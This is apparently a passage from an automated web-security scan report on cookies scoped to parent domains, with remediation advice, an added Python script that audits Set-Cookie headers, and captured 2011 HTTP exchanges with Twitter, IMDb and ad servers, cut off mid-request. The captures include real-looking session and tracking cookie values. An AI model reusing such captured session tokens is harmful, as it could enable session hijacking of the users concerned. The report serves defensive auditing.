A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript unless the HttpOnly flag is set. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, that is when the Set-Cookie header carries no Domain attribute, a cookie is host-only: browsers return it only to the exact host that issued it, not to its subdomains or to a parent domain. Removing the explicit domain attribute from your Set-Cookie directive therefore gives the cookie this narrowest scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain and its other subdomains, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.
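The following Python is an added example, not Burp Suite or Hoyt LLC code, that performs the review described above on raw Set-Cookie headers: it flags any cookie whose Domain attribute names a proper parent of the issuing host and records the extra indicators a reviewer wants, whether the name looks like a session token and whether the HttpOnly and Secure flags are present. The sample headers are the ones captured in 8.1 (api.twitter.com) and 8.2 (t.mookie1.com), with the _twitter_sess value shortened.

```python
"""Check Set-Cookie headers for cookies scoped to a parent of the host that
issued them, and report which of those also lack HttpOnly / Secure.

Added example for this report, not Burp Suite code. The sample headers are
the Set-Cookie lines captured in 8.1 (api.twitter.com) and 8.2
(t.mookie1.com); the _twitter_sess value is shortened."""
import re

# cookie names that usually carry a session identifier
SESSION_NAME = re.compile(r"sess|(^|_)sid($|_)|token|auth", re.I)


def parse_set_cookie(header: str) -> dict:
    """Split one Set-Cookie value into name, value and lower-cased attributes.
    Flag attributes without a value (HttpOnly, Secure) map to an empty string."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()
    return {"name": name.strip(), "value": value, "attrs": attrs}


def is_parent_scoped(issuing_host: str, domain_attr) -> bool:
    """True when Domain= names a proper parent of the issuing host, so every
    sibling subdomain will receive the cookie. A missing Domain attribute
    makes the cookie host-only, which is never parent-scoped."""
    if not domain_attr:
        return False
    domain = domain_attr.lstrip(".").lower()
    host = issuing_host.lower()
    return domain != host and host.endswith("." + domain)


def audit_set_cookies(issuing_host: str, headers: list) -> list:
    """One finding per parent-scoped cookie, with the risk indicators a
    reviewer wants: session-looking name, HttpOnly and Secure flags."""
    findings = []
    for header in headers:
        cookie = parse_set_cookie(header)
        domain_attr = cookie["attrs"].get("domain")
        if not is_parent_scoped(issuing_host, domain_attr):
            continue
        findings.append({
            "name": cookie["name"],
            "domain": domain_attr,
            "looks_like_session": bool(SESSION_NAME.search(cookie["name"])),
            "httponly": "httponly" in cookie["attrs"],
            "secure": "secure" in cookie["attrs"],
        })
    return findings


# Set-Cookie headers from the 8.1 response (second value shortened).
TWITTER_HEADERS = [
    "original_referer=Vs%2BEmu1btvuAmQsknyZNdVheq0tL9VpNzq2cJ7f%2Frku5HhKsM0INw8sY%2FgQVZoF0ZSkQVzHgBByWAa84JbboQ%2FY%2BxV5zsEAQMgn2qZyQ36Y%3D; path=/",
    "_twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCK3WaOQvAToHaWQiJWUxNWMxZGZmNGM4NjYx--fa39a0ccad9bf49b70a696e63158d18af30456d6; domain=.twitter.com; path=/; HttpOnly",
]
# Set-Cookie headers from the 8.2 response.
MOOKIE_HEADERS = [
    "id=914804995789526; path=/; expires=Tue, 05-Jun-12 13:34:00 GMT; domain=.mookie1.com",
    "session=1305207240|1305207240; path=/; domain=.mookie1.com",
]

if __name__ == "__main__":
    for host, headers in (("api.twitter.com", TWITTER_HEADERS), ("t.mookie1.com", MOOKIE_HEADERS)):
        for f in audit_set_cookies(host, headers):
            print("%s: %s scoped to %s session-like=%s HttpOnly=%s Secure=%s"
                  % (host, f["name"], f["domain"], f["looks_like_session"], f["httponly"], f["secure"]))
```

On the 8.1 response only _twitter_sess is reported: original_referer has no Domain attribute and is therefore host-only, exactly the default the remediation recommends. The flagged cookie does carry HttpOnly, which keeps script on sibling subdomains from reading it, but not Secure, so it would also travel over plain HTTP to any twitter.com host.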


8.1. http://api.twitter.com/1/statuses/user_timeline.json

Summary

Severity:   Low
Confidence:   Firm
Host:   http://api.twitter.com
Path:   /1/statuses/user_timeline.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain (see the Set-Cookie header in the response below). The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/statuses/user_timeline.json?screen_name=reganlee&callback=TWTR.Widget.receiveCallback_1&include_rts=true&count=4&clientsource=TWITTERINC_WIDGET&1305207062912=cachebust HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://orangeorb.blogspot.com/2011/05/planets-align-on-friday-13th-and.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=130314166807091166; __utmz=43838368.1303561994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=43838368.551233229.1303561994.1304617828.1304721594.4; k=173.193.214.243.1305161327073854

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:32:46 GMT
Server: hi
Status: 200 OK
X-Transaction: 1305207166-55904-42371
X-RateLimit-Limit: 150
ETag: "f16b5231d379a8faccd3bcb746c7a175"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Thu, 12 May 2011 13:32:46 GMT
X-RateLimit-Remaining: 148
X-Runtime: 0.01698
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef11477ab40b6
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 0ea1ebd7e3c3292a1466a749293e9011989f70f4
X-RateLimit-Reset: 1305210664
Set-Cookie: original_referer=Vs%2BEmu1btvuAmQsknyZNdVheq0tL9VpNzq2cJ7f%2Frku5HhKsM0INw8sY%2FgQVZoF0ZSkQVzHgBByWAa84JbboQ%2FY%2BxV5zsEAQMgn2qZyQ36Y%3D; path=/
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCK3WaOQvAToHaWQiJWUxNWMxZGZmNGM4NjYx%250AN2Q1NGM2MzhmNzhiM2MxODMzIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--fa39a0ccad9bf49b70a696e63158d18af30456d6; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Connection: close
Content-Length: 7125

TWTR.Widget.receiveCallback_1([{"text":"Review of book Insight http:\/\/orangeorbreview.blogspot.com\/2011\/05\/book-review-insight.html","id_str":"68512311291289601","created_at":"Thu May 12 03:06:22
...[SNIP]...

8.2. http://t.mookie1.com/t/v1/imp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://t.mookie1.com
Path:   /t/v1/imp

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain (see the Set-Cookie headers in the response below). One of them appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /t/v1/imp?migAgencyId=234&migSource=atlas&migAtlAI=205850472&migRandom=845927450&migTagDesc=Cingular&migAtlSA=286444146&migAtlC=480d7815-42e6-4315-a737-64cdf14f8adc HTTP/1.1
Host: t.mookie1.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/286444146/direct;wi.300;hi.250/01?click=http%3A%2F%2Ft.invitemedia.com%2Ftrack_click%3FauctionID%3D13052070721588565-93912%26campID%3D90206%26crID%3D93912%26pubICode%3D2083508%26pub%3D369335%26partnerID%3D38%26redirectURL%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; RMFL=011QD4ETU107OI|U107OK; RMFM=011QJT9qC10CWN|N10CXL|U10JLR; NXCLICK2=011QJT9qNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiExecutivesData_NX_NonSecure!y!B3!JLR!Hfl; id=914804995789526

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:34:00 GMT
Server: Apache/2.0.52 (Red Hat)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="NOI DSP COR NID CUR OUR NOR"
Set-Cookie: id=914804995789526; path=/; expires=Tue, 05-Jun-12 13:34:00 GMT; domain=.mookie1.com
Set-Cookie: session=1305207240|1305207240; path=/; domain=.mookie1.com
Content-Length: 35
Content-Type: image/gif

GIF87a.............,...........D..;

8.3. http://www.imdb.com/title/tt0758746/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.imdb.com
Path:   /title/tt0758746/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /title/tt0758746/ HTTP/1.1
Host: www.imdb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:32:10 GMT
Server: Server
Cache-Control: private
Cneonction: close
Content-Type: text/html
Set-Cookie: uu=BCYoEYVRn4Z080oVMyaiqkqVil4NObOLHdXg6V5nGFmrKaSp0r5qR1B2q9QdB7DhaW1bB8f4YSIcdmATWdaiYxq_IKR6HKOfkXgDQfVNYlQiBpSUrIq7tamZGfahcbUG9demse85k_CYY6GSxnL7TXGOTdF22fYw9tuZoqsJ96-9rbgaeJ1YzXUvXfDBmlNbH7O2NATYg9Gj1v-3XgpM4a7BxgwwkkhBCdF9BCMNauUPDHvyMm6Wd_QvKZjUSKBxpz_0SyBElOdhtkg2XpExQVhTtg;expires=Thu, 30 Dec 2037 00:00:00 GMT;path=/;domain=.imdb.com
Set-Cookie: cs=x1X0LC0cCNNUopm1JgkB7wCmW+248W26o5HlqiOSHqmTom7pgKHNGbCxbbqm1js64JFtupZmeM2jsk9fJ9HNKeCRWyxAGW26oKdbraCRbbqgsW26oJFt+uDBHYqg==;expires=Fri, 13 May 2011 07:00:00 GMT;path=/;domain=.imdb.com
Set-Cookie: cs=5DCTg6yZP2fcEVMbF0nxoAiOAiSO2RITtsmaRI3KISQNijEn/noBF47ZEhQoWVIEjtkkY9gaIiSL/CSSbf6WwAmZspee2SSyblESJI7vJDOO2RIkjvkSJI7ZEmTOiWIUg=;expires=Fri, 13 May 2011 07:00:00 GMT;path=/;domain=.imdb.com
Set-Cookie: cs=Qy5PblGX7FQYyXU8oLHhYQiOAiSO2RITtsmaRI3KISQNijEn/noBF47ZEhQoWVIEjtkkY9l9kiSN/yWjjd13MsmZspeu2SSyblESJI7vJDOO2RIkjvkSJI7ZEmTOiWIUg=;expires=Fri, 13 May 2011 07:00:00 GMT;path=/;domain=.imdb.com
Set-Cookie: cs=lCczZSsnIliq67dpM+chZACmW+248W26o5HlqiOSHqmTom7pgKHNGbCxbbqm1js64JFtupbHGr/ThyscN9HNKfCRWyxAGW26oKdbraCRbbqgsW26oJFt+uDBHYqg==;expires=Fri, 13 May 2011 07:00:00 GMT;path=/;domain=.imdb.com
Set-Cookie: cs=QkXpKjI6/xJZJiwqwOYA/gbGfbqgkW2NmIHl2qOCXrojwk650DJ+iaCRbYoGES2aoJFb/fcWXbqj05s5t9HNyfCRWyxAGW26oKdbraCRbbqgsW26oJFt+uDBHYqg==;expires=Fri, 13 May 2011 07:00:00 GMT;path=/;domain=.imdb.com
Set-Cookie: cs=7FXQMV6N2neppbMXfWZiOwenOqqgkW26kBl9MsPifomjkj6ZoDHOqZCRbbqXx+36gJFtjOSnGIqjpggpN9HNOeCRWyxAGW26oKdbraCRbbqgsW26oJFt+uDBHYqg==;expires=Fri, 13 May 2011 07:00:00 GMT;path=/;domain=.imdb.com
Set-Cookie: session-id=864-5207130-5211698;path=/;domain=.imdb.com;expires=Tue, 10 May 2016 06:32:10 GMT
Set-Cookie: session-id-time=1462887130;path=/;domain=.imdb.com;expires=Tue, 10 May 2016 06:32:10 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://i.imdb.com/images/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
Content-Length: 93623


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/sch
...[SNIP]...

8.4. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?uilKAFF8CQD5Q0gAAAAAAFufCgAAAAAAAgAAAAYAAAAAAP8AAAAFCW8VDwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABgyQQAAAAAAAIAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABa8F1Eo8UUCvN5p9OBJ4HIO6F18GIqSmJVEsk5AAAAAA==,,http%3A%2F%2Fwww.mysuburbanlife.com%2Flyons%2Flifestyle%2Fentertainment%2Fx1539859994%2Fto-do-tonight-watch-american-idol-priest-opens-friday-the-13th,Z%3D728x90%26s%3D621649%26_salt%3D1477449765%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.mysuburbanlife.com%252Flyons%252Flifestyle%252Fentertainment%252Fx1539859994%252FTo-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th%26r%3D0,1c5cab68-7c9c-11e0-acd7-cb9ffa1aa3ae
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadver_05-11-2011-14-59-16_8816927001305125956ZZZZadcon_05-11-2011-14-59-56_9087559411305125996; SERVERID=s15

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:33:35 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Sun, 15-May-2011 13:33:35 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-11-2011-14-59-56_9087559411305125996ZZZZadver_05-12-2011-13-33-35_10260675261305207215; expires=Tue, 10-May-2016 13:33:35 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_10260675261305207215; expires=Thu, 12-May-2011 13:48:35 GMT; path=/; domain=c3metrics.com
Content-Length: 6659
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...

8.5. http://a.tribalfusion.com/displayAd.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /displayAd.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /displayAd.js?dver=0.3&th=22201705828 HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://crenk.com/buy-chromebook/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=...[SNIP]...

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 153
X-Reuse-Index: 1
Date: Thu, 12 May 2011 13:29:46 GMT
Last-Modified: Sun, 08 May 2011 10:17:40 GMT
Expires: Wed, 10 Aug 2011 13:29:46 GMT
Set-Cookie: ANON_ID=...[SNIP]...; path=/; domain=.tribalfusion.com; expires=Wed, 10-Aug-2011 13:29:46 GMT;
Cache-Control: private
Content-Type: application/x-javascript
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 60

var e9;
if (e9.displayAdFlag == true) {
e9.displayAd();
}

8.6. http://a.tribalfusion.com/j.ad

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /j.ad

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /j.ad?site=crenkcom&adSpace=ros&tagKey=2218970080&th=22201705828&tKey=undefined&size=300x250&p=6869973&a=2&flashVer=10&ver=1.20&center=1&addBlockingCategories=Survey|Pop-up|Pop-under|Expandable|Audio|Full-page|Floating|Warning&url=http%3A%2F%2Fcrenk.com%2Fbuy-chromebook%2F&f=0&rnd=6884586 HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://crenk.com/buy-chromebook/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=...[SNIP]...

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 101
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Set-Cookie: ANON_ID=apnteZaRkPN7RyK3AbHMZasF4sP2KljaU43iokocYcZanZaffVfSqVtMFK2IERIZdlS1sxiMGfTECMgE2MA4bLecZcZbesHT1ky6f5n3qpIDfZbnvvVv7VofnZasAYbp9lI784xl4ZcZb6YKwssIJrU5Y2dMSTfx6ZbPNGdZdy49kwUVOZcbZclLbjAhBa6BwnySEfw88clIkZcTwmJp2GabLvbb7oKoGP8UQu131I7ZdhbuEvexVkZcw8lLNsbBUca1Zc0vfnQ6vZdZcV5fa84hJs7LQfxweiawgxBM88rvhvTU6Zcp94EG20YR6D7oPPZdxh1BU8pyAjXvtDaDrvJsVPrGTZaxdwXv9b25uoZdZbX7B9lmVGW8i4PtbTZaF2ZaMs2ZcHXDB6rl2AsBvkZd1tVPdoiZdZdOlDUNXauxqk4WYYyP8m5Eq0pbNpWMDNNdOrdIvygS3ZaSwGFR0Xm2MgbDZbdy9YY5amRCUuT5WHhhwjomrWFsqtL6V3qHQjO27gRRIsVoZd1R8YbdNPCcvNbGGKiVZbgUWcguaiYPdZdAYoOaQCgCOYUDpC1a0pJKE6UilOxa6cmPW1MEr83ZbqCDpZbKVkG1sdvmLBlf6LGPjUMBnKl2e0DE8JolffM5jFO7tgqwbjigs6qnZbZd5scTZdZc1Zc5yZc7ivc2Zb1aZdQp70J2kAvJchH4FwVIZb2UZdZbaoiRFn46qZdFj0ucy2I6RsPryvxeVPYsHv0bqfZd9s5D9OqOGcZcZd6l7AolO182aRZdMxtZboqORJXZdJA67lCBXg4Zd9LS8rGT9JK1RC6uH1Q5qFW2Ue; path=/; domain=.tribalfusion.com; expires=Wed, 10-Aug-2011 13:29:01 GMT;
Content-Type: application/x-javascript
Vary: Accept-Encoding
Expires: 0
Connection: keep-alive
Content-Length: 187

document.write('<iframe src="http://routenote.com/blog/TFadvertising/300.htm" width=300 height=250 marginwidth=0 marginheight=0 hspace=0 vspace=0 frameborder=0 scrolling=no><\/iframe>');

8.7. http://action.mathtag.com/mm/rtb/COFC/1008A2/imp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://action.mathtag.com
Path:   /mm/rtb/COFC/1008A2/imp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mm/rtb/COFC/1008A2/imp?ci=&li=&pe=&pt=&pi=&sc=&ct=&vi=&px=&su= HTTP/1.1
Host: action.mathtag.com
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkpOMEYwYjJoYVFVSXhkVlpSUjA5elRsaFZhMlJKL05HUmhZamRrTXpVdFlqRmtNaTA1TVRWaExXUXpZekF0T1dRMU4yWTVZelkyWWpBMy8yNTQzOTk2NDY1MzI1NDQwMzEvMTE1MDAxLzEwMDQ3MC80L1EzQW1fQ25wZlFVZ053MjlWUjRoVHBmNzUtYWowd0pHOHN5dWFTWnc1Qm8v/eM1wOfWIxZ9RKD_2JFr8hJB1kM4&price=TcvhHwAGrxsK7Fqwx8QugpKAEgOl8KAu6D5byA&dck=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB3GM9H-HLTZveGrC1sQeC3ZC-DNzvj_EBhpu-vBGs6YOTEgAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi0zNjI5OTM5MzY0Mzc1OTg0oAHg6pnsA7IBGnd3dy5taWxlaGlnaG9udGhlY2hlYXAuY29tugEKMTYweDYwMF9hc8gBCdoBYGh0dHA6Ly93d3cubWlsZWhpZ2hvbnRoZWNoZWFwLmNvbS8yMDExLzA1L25vLWZvb2xpbi1mcmVlLWNhdC1mcmlkYXktYWRvcHRpb24tc3BlY2lhbC1pbi1ib3VsZGVyL5gCxg_AAgTIAtbBjA6oAwHoA_MG6AO6KugD8gb1AwAAAMSABty1zYTyhKGTrwE%26num%3D1%26sig%3DAGiWqtxXQhDQNGr4Rg9Q9u2Yp7R_clKOjA%26client%3Dca-pub-3629939364375984%26adurl%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; ts=1305129714; mt_mop=4:1305207074

Response

HTTP/1.1 200 OK
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 ewr-pixel-x3 pid 0x7846 30790
Content-Type: image/gif
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Date: Thu, 12 May 2011 13:33:21 GMT
Etag: 4dab7d35-b1d2-915a-d3c0-9d57f9c66b07
Set-Cookie: ts=1305207201; domain=.mathtag.com; path=/; expires=Fri, 11-May-2012 13:33:21 GMT
Content-Length: 43
Accept-Ranges: bytes
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: Keep-Alive

GIF89a.............!.......,...........D..;

8.8. http://ads.adbrite.com/adserver/behavioral-data/8201

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/behavioral-data/8201

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/behavioral-data/8201?d=24 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://loadus.exelator.com/load/net.php?n=PGltZyBzcmM9Imh0dHA6Ly9waXhlbC5tYXRodGFnLmNvbS9kYXRhL2ltZz9tdF9pZD0xMDAxMzQmbXRfZGNpZD0yNCZ2MT0mdjI9JnYzPSZzMT0mczI9JnMzIiB3aWR0aD0iMSIgaGVpZ2h0PSIxIj48L2ltZz48aW1nIHNyYz0iaHR0cDovL2JzdGF0cy5hZGJyaXRlLmNvbS9jbGljay9ic3RhdHMuZ2lmP2JhcGlkPTYzODgmdWlkPTc2ODkxMCZraWQ9NDMxMDU5OTkiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiIGJvcmRlcj0iMCI%2BPC9pbWc%2BPGltZyBzcmM9Imh0dHA6Ly9hZHMuYWRicml0ZS5jb20vYWRzZXJ2ZXIvYmVoYXZpb3JhbC1kYXRhLzgyMDE%2FZD0yNCIgd2lkdGg9IjAiIGhlaWdodD0iMCIgYm9yZGVyPSIwIj48L2ltZz48aW1nIHNyYz0iaHR0cDovL2EuY29sbGVjdGl2ZS1tZWRpYS5uZXQvZGF0YXBhaXI%2FbmV0PWV4JnNlZ3M9MTUmb3A9YWRkIiB3aWR0aD0iMSIgaGVpZ2h0PSIxIj48L2ltZz4%3D&h=97ff285f8e77e8edbb026a8559ac3e76
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3Ax6zw%2Cxews%2Clln4%2Cllra%2Cx4co%2Cx4cn%2Cx4cw%2C12gg8%2C12ggb%2C6e73"; rb="0:682865:20838240:null:0:684339:20838240:uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:712156:20861280:xrd52zkwjuxh:0:742697:20828160:2931142961646634775:0:753292:20858400:AM-00000000030620452:0:762701:20861280:978972DFA063000D2C0E7A380BFA1DEC:0:779045:20861280:17647108006034089:0:782606:20861280::0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0:810647:21077280:549188a1-a07c-4231-be94-7f725e1a19f7:0:830697:20838240:9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC:0"; srh="1%3Aq64FAA%3D%3D"; 